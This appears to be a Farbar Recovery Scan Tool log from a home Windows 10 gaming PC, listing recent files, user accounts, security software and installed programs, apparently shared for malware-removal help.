    2016-02-10 23:27 - 2016-01-31 15:19 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkDesktopSettings.dll
    2016-02-10 23:27 - 2016-01-31 15:19 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IoTAssignedAccessLockFramework.dll
    2016-02-10 23:27 - 2016-01-31 15:18 - 00771072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
    2016-02-10 23:27 - 2016-01-31 15:18 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
    2016-02-10 23:27 - 2016-01-31 15:17 - 19324928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
    2016-02-10 23:27 - 2016-01-31 15:16 - 00950272 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
    2016-02-10 23:27 - 2016-01-31 15:14 - 07525376 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
    2016-02-10 23:27 - 2016-01-31 15:14 - 03588096 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
    2016-02-10 23:27 - 2016-01-31 15:13 - 00123392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasman.dll
    2016-02-10 23:27 - 2016-01-31 15:13 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\ztrace_maps.dll
    2016-02-10 23:27 - 2016-01-31 15:11 - 00678400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
    2016-02-10 23:27 - 2016-01-31 15:11 - 00291840 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
    2016-02-10 23:27 - 2016-01-31 15:11 - 00162304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
    2016-02-10 23:27 - 2016-01-31 15:07 - 18802176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
    2016-02-10 23:27 - 2016-01-31 15:06 - 02316800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
    2016-02-10 23:27 - 2016-01-31 15:05 - 01380864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
    2016-02-10 23:27 - 2016-01-31 15:05 - 00574464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
    2016-02-10 23:27 - 2016-01-31 15:05 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
    2016-02-10 23:27 - 2016-01-31 15:02 - 03580416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
    2016-02-10 23:27 - 2016-01-31 15:02 - 00768000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
    2016-02-10 23:27 - 2016-01-31 14:59 - 05457408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
    2016-02-10 23:27 - 2016-01-31 14:58 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ztrace_maps.dll
    2016-02-09 22:56 - 2016-02-09 22:56 - 00281328 _____ C:\WINDOWS\Minidump\020916-19296-01.dmp
    2016-02-09 03:29 - 2016-02-09 03:29 - 00001277 _____ C:\Users\Kym\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CNext.lnk
    2016-02-09 03:28 - 2016-02-09 03:28 - 00004296 _____ C:\WINDOWS\System32\Tasks\AMD Updater
    2016-02-09 03:25 - 2016-02-13 19:16 - 00000000 ____D C:\Users\Kym\AppData\Local\AMD
    2016-02-09 03:25 - 2016-02-09 03:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings
    2016-02-09 03:25 - 2016-02-09 03:25 - 00000000 ____D C:\Program Files\Common Files\ATI Technologies
    2016-02-09 03:20 - 2016-02-09 03:23 - 322471624 _____ (AMD Inc.) C:\Users\Kym\Downloads\radeon-crimson-15.12-win10-64bit.exe
    2016-02-08 02:13 - 2016-02-08 02:13 - 00000202 _____ C:\Users\Kym\Desktop\Tom Clancy's Rainbow Six Siege.url
    2016-02-03 19:16 - 2016-02-03 19:16 - 06253170 _____ C:\Users\Kym\Downloads\1776 - Donkey Kong Country 2 (U)(Independent).zip
    2016-02-03 19:07 - 2016-02-03 19:08 - 11918630 _____ C:\Users\Kym\Downloads\2214 - Donkey Kong Country 3 (E)(Rising Sun).zip
    2016-02-03 19:06 - 2016-02-03 19:06 - 02981626 _____ C:\Users\Kym\Downloads\Donkey Kong Country 2 - Diddy's Kong Quest (USA) (En,Fr) (Rev A).zip
    2016-02-03 19:04 - 2016-02-03 19:04 - 05642942 _____ C:\Users\Kym\Downloads\1055 - Donkey Kong Country (U)(Evasion).zip
    2016-02-02 12:22 - 2016-02-02 12:22 - 00000000 ____D C:\Users\Kym\Documents\MIsc

    ==================== One Month Modified files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2016-03-01 22:06 - 2014-05-02 21:01 - 00000920 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
    2016-03-01 21:42 - 2014-10-12 20:42 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
    2016-03-01 20:14 - 2015-12-25 19:32 - 00004144 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{5957CCCD-7167-42EC-BDE9-58F86B871E77}
    2016-03-01 17:06 - 2014-05-02 21:01 - 00000916 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
    2016-03-01 13:55 - 2014-05-02 22:28 - 00000000 ____D C:\Users\Kym\AppData\Roaming\uTorrent
    2016-03-01 12:54 - 2015-08-09 01:28 - 01011482 _____ C:\WINDOWS\system32\PerfStringBackup.INI
    2016-03-01 12:54 - 2015-07-10 21:02 - 00000000 ____D C:\WINDOWS\INF
    2016-03-01 12:52 - 2015-07-10 21:04 - 00000000 ____D C:\WINDOWS\AppReadiness
    2016-03-01 12:49 - 2014-09-10 20:01 - 00003804 _____ C:\WINDOWS\System32\Tasks\AutoKMS
    2016-03-01 12:48 - 2015-08-09 01:48 - 00000000 __SHD C:\Users\Kym\IntelGraphicsProfiles
    2016-03-01 12:48 - 2015-08-09 01:27 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
    2016-03-01 12:48 - 2015-07-10 22:21 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
    2016-03-01 12:48 - 2015-07-10 21:04 - 00000000 ____D C:\WINDOWS\addins
    2016-03-01 12:48 - 2015-07-10 19:05 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
    2016-03-01 12:19 - 2015-08-09 17:12 - 00000000 ____D C:\Users\Kym\AppData\LocalLow\Temp
    2016-03-01 12:19 - 2015-08-09 01:29 - 00000000 ____D C:\Users\Kym
    2016-02-29 12:23 - 2015-07-10 21:04 - 00000000 ___HD C:\Program Files\WindowsApps
    2016-02-28 17:59 - 2014-05-02 21:43 - 00004280 _____ C:\WINDOWS\System32\Tasks\avast! Emergency Update
    2016-02-26 00:31 - 2015-08-09 11:27 - 00000000 ____D C:\Users\Kym\AppData\Local\MicrosoftEdge
    2016-02-25 23:54 - 2009-07-14 15:32 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
    2016-02-25 23:38 - 2015-04-09 16:31 - 00000000 ____D C:\Users\Kym\Documents\Outlook Files
    2016-02-25 23:16 - 2014-10-18 18:59 - 00097888 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
    2016-02-25 23:16 - 2014-10-18 18:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
    2016-02-25 23:16 - 2014-10-18 18:59 - 00000000 ____D C:\Program Files (x86)\Java
    2016-02-25 22:43 - 2014-10-18 18:43 - 00000000 ____D C:\AMD
    2016-02-19 20:02 - 2015-03-12 22:56 - 00000000 ____D C:\Users\Kym\AppData\Local\Spotify
    2016-02-19 20:01 - 2015-03-12 22:54 - 00000000 ____D C:\Users\Kym\AppData\Roaming\Spotify
    2016-02-18 21:54 - 2016-01-16 18:56 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
    2016-02-18 00:33 - 2015-07-10 21:04 - 00000000 ____D C:\WINDOWS\system32\NDF
    2016-02-16 19:47 - 2015-07-10 21:04 - 00000000 ____D C:\WINDOWS\rescache
    2016-02-16 19:24 - 2014-05-25 16:10 - 00000000 ____D C:\Users\Kym\AppData\Local\ElevatedDiagnostics
    2016-02-15 20:11 - 2015-08-09 01:48 - 00000000 ____D C:\Users\Kym\AppData\Local\Packages
    2016-02-15 13:32 - 2015-09-27 23:34 - 00000000 ____D C:\WINDOWS\Minidump
    2016-02-13 19:10 - 2014-11-20 11:53 - 00000000 ____D C:\Users\Kym\AppData\Local\PokerStars
    2016-02-13 13:57 - 2015-07-10 23:14 - 00000000 ____D C:\Program Files\Windows Journal
    2016-02-12 19:44 - 2015-08-08 23:54 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013
    2016-02-12 19:42 - 2015-07-10 20:55 - 00000000 ____D C:\WINDOWS\CbsTemp
    2016-02-12 19:42 - 2009-07-14 12:34 - 00000478 _____ C:\WINDOWS\win.ini
    2016-02-12 19:41 - 2014-05-04 15:26 - 00000000 ____D C:\WINDOWS\system32\MRT
    2016-02-12 19:37 - 2014-05-04 15:26 - 146614896 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
    2016-02-09 03:30 - 2014-09-29 14:52 - 00000000 ____D C:\Program Files (x86)\Raptr
    2016-02-09 03:25 - 2015-08-09 01:27 - 00000000 ____D C:\Program Files\AMD
    2016-02-09 03:25 - 2015-02-12 08:41 - 00000000 ____D C:\Program Files (x86)\AMD
    2016-02-09 03:19 - 2014-09-22 17:29 - 00000000 ____D C:\ProgramData\AMD
    2016-02-08 23:26 - 2015-11-28 22:42 - 00000000 ____D C:\Users\Kym\AppData\Local\Ubisoft Game Launcher
    2016-02-08 16:30 - 2014-09-02 15:05 - 00000000 ____D C:\Users\Kym\Documents\My Games
    2016-02-08 16:17 - 2015-08-09 01:28 - 00000000 ____D C:\ProgramData\Package Cache
    2016-02-03 08:47 - 2015-07-10 21:06 - 00828920 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
    2016-02-03 08:47 - 2015-07-10 21:06 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
    2016-02-02 17:01 - 2014-05-02 21:01 - 00003978 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
    2016-02-02 17:01 - 2014-05-02 21:01 - 00003746 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
    2016-02-01 22:21 - 2014-10-03 09:28 - 00000000 ____D C:\Users\Kym\Documents\Bond
    2016-02-01 21:47 - 2014-05-02 21:02 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive

    ==================== Files in the root of some directories =======

    2015-09-08 19:17 - 2015-09-08 19:17 - 0000000 _____ () C:\Program Files (x86)\ATI Technologies
    2015-08-14 11:25 - 2015-08-14 11:25 - 0000000 _____ () C:\Program Files (x86)\Common Files\AMD
    2014-07-23 14:06 - 2015-02-19 13:45 - 0000953 _____ () C:\Users\Kym\AppData\Roaming\Network Meter_Settings.ini
    2014-07-23 17:57 - 2015-08-09 01:04 - 0000028 _____ () C:\Users\Kym\AppData\Roaming\Network Meter_Usage.ini
    2014-05-02 20:55 - 2014-08-28 11:18 - 0007599 _____ () C:\Users\Kym\AppData\Local\Resmon.ResmonCfg
    2015-06-18 16:22 - 2015-06-18 16:27 - 0000260 _____ () C:\ProgramData\csgobm.project
    2015-06-18 16:22 - 2015-06-18 16:27 - 0000002 _____ () C:\ProgramData\csgobm2.project
    2015-06-18 16:19 - 2015-06-18 16:19 - 0010299 _____ () C:\ProgramData\csgobmbacked.cfg
    2015-06-18 16:19 - 2015-06-18 16:19 - 0000077 _____ () C:\ProgramData\csgobmsettings.ini
    2015-08-09 01:27 - 2015-08-09 01:27 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

    Some files in TEMP:
    ====================
    C:\Users\Kym\AppData\Local\Temp\sqlite3.dll


    ==================== Bamital & volsnap =================

    (There is no automatic fix for files that do not pass verification.)

    C:\WINDOWS\system32\winlogon.exe => File is digitally signed
    C:\WINDOWS\system32\wininit.exe => File is digitally signed
    C:\WINDOWS\explorer.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
    C:\WINDOWS\system32\svchost.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
    C:\WINDOWS\system32\services.exe => File is digitally signed
    C:\WINDOWS\system32\User32.dll => File is digitally signed
    C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
    C:\WINDOWS\system32\userinit.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
    C:\WINDOWS\system32\rpcss.dll => File is digitally signed
    C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
    C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
    C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


    LastRegBack: 2016-02-29 12:25

    ==================== End of FRST.txt ============================

    Additional scan result of Farbar Recovery Scan Tool (x64) Version:27-02-2016
    Ran by Kym (2016-03-01 22:12:09)
    Running from C:\Users\Kym\Desktop
    Windows 10 Home (X64) (2015-08-08 15:48:30)
    Boot Mode: Normal
    ==========================================================


    ==================== Accounts: =============================

    Administrator (S-1-5-21-788086572-3644745805-1037152649-500 - Administrator - Disabled)
    DefaultAccount (S-1-5-21-788086572-3644745805-1037152649-503 - Limited - Disabled)
    Guest (S-1-5-21-788086572-3644745805-1037152649-501 - Limited - Disabled)
    HomeGroupUser$ (S-1-5-21-788086572-3644745805-1037152649-1002 - Limited - Enabled)
    Kym (S-1-5-21-788086572-3644745805-1037152649-1000 - Administrator - Enabled) => C:\Users\Kym

    ==================== Security Center ========================

    (If an entry is included in the fixlist, it will be removed.)

    AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
    AS: Spybot - Search and Destroy (Enabled - Up to date) {A16C3F68-9280-E053-1818-342707FECF4D}
    AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}

    ==================== Installed Programs ======================

    (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

    µTorrent (HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\uTorrent) (Version: 3.4.5.41712 - BitTorrent Inc.)
    Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.010.20059 - Adobe Systems Incorporated)
    Adobe Photoshop CC 2014 (HKLM-x32\...\{D7A4F897-B20A-42D0-862D-CB5F6DB7391D}) (Version: 15.0 - Adobe Systems Incorporated)
    Adobe Premiere Elements 11 (HKLM\...\PremElem110) (Version: 11.0 - Adobe Systems Incorporated)
    Adobe Premiere Elements 11 (Version: 11.0 - Adobe Systems Incorporated) Hidden
    Adobe Reader XI (11.0.13) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.13 - Adobe Systems Incorporated)
    AMD Install Manager (HKLM\...\AMD Catalyst Install Manager) (Version: 5.00 - Advanced Micro Devices, Inc.)
    Apple Application Support (32-bit) (HKLM-x32\...\{3540ADD5-822B-47FB-B1C2-CD7B2C8E9FEC}) (Version: 4.0.2 - Apple Inc.)
    Apple Application Support (64-bit) (HKLM\...\{C9C0FE2C-602E-49D7-8C42-5B9E8FF04798}) (Version: 4.0.2 - Apple Inc.)
    Apple Mobile Device Support (HKLM\...\{FD244E19-6EFE-4A2D-948A-0D45D4C168BE}) (Version: 9.0.0.26 - Apple Inc.)
    Apple Software Update (HKLM-x32\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Version: 2.1.4.131 - Apple Inc.)
    Arma 3 (HKLM-x32\...\Steam App 107410) (Version: - Bohemia Interactive)
    Avast Free Antivirus (HKLM-x32\...\Avast) (Version: 10.2.2218 - AVAST Software)
    Awesomenauts (HKLM-x32\...\Steam App 204300) (Version: - Ronimo Games)
    Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
    Beyond Gravity (HKLM-x32\...\Steam App 317510) (Version: - Qwiboo Ltd)
    BioShock (HKLM-x32\...\Steam App 7670) (Version: - 2K Boston)
    BioShock 2 (HKLM-x32\...\Steam App 8850) (Version: - 2K Marin)
    BioShock Infinite (HKLM-x32\...\Steam App 8870) (Version: - Irrational Games)
    Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
    Brother MFL-Pro Suite DCP-J4110DW (HKLM-x32\...\{DD98C438-D769-4677-AA87-3481FA32D20C}) (Version: 2.0.0.0 - Brother Industries, Ltd.)
    Catalyst Control Center Next Localization BR (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization CHS (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization CHT (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization CS (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization DA (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization DE (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization EL (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization ES (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization FI (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization FR (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization HU (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization IT (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization JA (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization KO (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization NL (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization NO (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization PL (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization RU (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization SV (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization TH (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization TR (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Clicker Heroes (HKLM-x32\...\Steam App 363970) (Version: - Playsaurus)
    Contagion (HKLM-x32\...\Steam App 238430) (Version: - Monochrome LLC)
    Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version: - Valve)
    Curse (HKLM-x32\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 6.0.0.0 - Curse)
    DayZ (HKLM-x32\...\Steam App 221100) (Version: - Bohemia Interactive)
    Diablo III (HKLM-x32\...\Diablo III) (Version: - Blizzard Entertainment)
    Dota 2 (HKLM-x32\...\Steam App 570) (Version: - Valve)
    Elements 11 Organizer (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
    f.lux (HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Flux) (Version: - )
    Full Tilt Poker (HKLM-x32\...\{D4C9692E-4EFA-4DA0-8B7F-9439466D9E31}) (Version: 5.44.1.WIN.FullTilt.COM - )
    Garry's Mod (HKLM-x32\...\Steam App 4000) (Version: - Facepunch Studios)
    Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.116 - Google Inc.)
    Google Drive (HKLM-x32\...\{EF61675D-9BBC-4EC7-B906-F13BE8D3BD20}) (Version: 1.27.1227.2094 - Google, Inc.)
    Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
    Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
    Hearthstone (HKLM-x32\...\Hearthstone) (Version: - Blizzard Entertainment)
    Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version: - Blizzard Entertainment)
    IBM SPSS Statistics 23 (HKLM\...\{C3BA73A4-2A45-4036-8541-4F5F8146078B}) (Version: 23.0.0.0 - IBM Corp)
    iExplorer 3.6.1.0 (HKLM-x32\...\{7FD8B0C1-CDDA-4B4D-A577-B2E3570EA3A3}_is1) (Version: - Macroplant LLC)
    Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation)
    Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3308 - Intel Corporation)
    Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.0.1016 - Intel Corporation)
    Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.0.19 - Intel Corporation)
    Internode Monthly Usage Meter 8.6.3 (HKLM-x32\...\Internode Monthly Usage Meter_is1) (Version: - )
    iTunes (HKLM\...\{88509E20-3936-4D88-A1C0-B274C7BB5151}) (Version: 12.3.0.44 - Apple Inc.)
    Java 8 Update 31 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218031F0}) (Version: 8.0.310 - Oracle Corporation)
    Java 8 Update 74 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218074F0}) (Version: 8.0.740.2 - Oracle Corporation)
    League of Legends (HKLM-x32\...\League of Legends 3.0.0) (Version: 3.0.0 - Riot Games)
    League of Legends (x32 Version: 3.0.0 - Riot Games) Hidden
    Left 4 Dead 2 (HKLM-x32\...\Steam App 550) (Version: - Valve)
    Logitech G35 (HKLM\...\{27607A94-33AC-4AA7-AACE-95AF6ACA3E30}) (Version: 1.1.178 - Logitech)
    Logitech Gaming Software 8.70 (HKLM\...\Logitech Gaming Software) (Version: 8.70.315 - Logitech Inc.)
    LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.410 - LogMeIn, Inc.)
    LogMeIn Hamachi (x32 Version: 2.2.0.410 - LogMeIn, Inc.) Hidden
    Malwarebytes Anti-Malware version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
    Marvel Heroes 2015 (HKLM-x32\...\Steam App 226320) (Version: - Gazillion Entertainment)
    Metro: Last Light (HKLM-x32\...\Steam App 43160) (Version: - 4A Games)
    Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
    Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
    Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
    Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
    Middle Earth Shadow of Mordor (HKLM-x32\...\Middle Earth Shadow of Mordor_is1) (Version: - )
    Monaco What's Yours Is Mine (HKLM-x32\...\Monaco What's Yours Is Mine_is1) (Version: Monaco What's Yours Is Mine - )
    MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
    MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
    Nitronic Rush (IGF Pro 2012) version 20111017.0 (HKLM-x32\...\{9B55759D-424F-4CB1-B84E-AAE83CC1D20A}_is1) (Version: 20111017.0 - DigiPen)
    Nuance PaperPort 12 (HKLM-x32\...\{88B5FBDC-967D-4B1F-B291-39284AE12201}) (Version: 12.1.0005 - Nuance Communications, Inc.)
    Nuance PDF Viewer Plus (HKLM-x32\...\{28656860-4728-433C-8AD4-D1A930437BC8}) (Version: 5.30.3290 - Nuance Communications, Inc)
    NVIDIA PhysX (HKLM-x32\...\{80407BA7-7763-4395-AB98-5233F1B34E65}) (Version: 9.13.1220 - NVIDIA Corporation)
    ON_OFF Charge 2 B13.1028.1 (HKLM-x32\...\InstallShield_{6B4ED6F7-BB88-4945-B0C6-01410E1BAC3A}) (Version: 1.00.0000 - GIGABYTE)
    ON_OFF Charge 2 B13.1028.1 (x32 Version: 1.00.0000 - GIGABYTE) Hidden
    Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version: - )
    OpenAL (HKLM-x32\...\OpenAL) (Version: - )
    Outils de vérification linguistique 2013 de Microsoft Office*- Français (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
    PaperPort Image Printer 64-bit (HKLM\...\{715CAACC-579B-4831-A5F4-A83A8DE3EFE2}) (Version: 14.00.0000 - Nuance Communications, Inc.)
    PokerStars (HKLM-x32\...\PokerStars) (Version: - PokerStars)
    PRE11 STI 64Installer (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
    QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
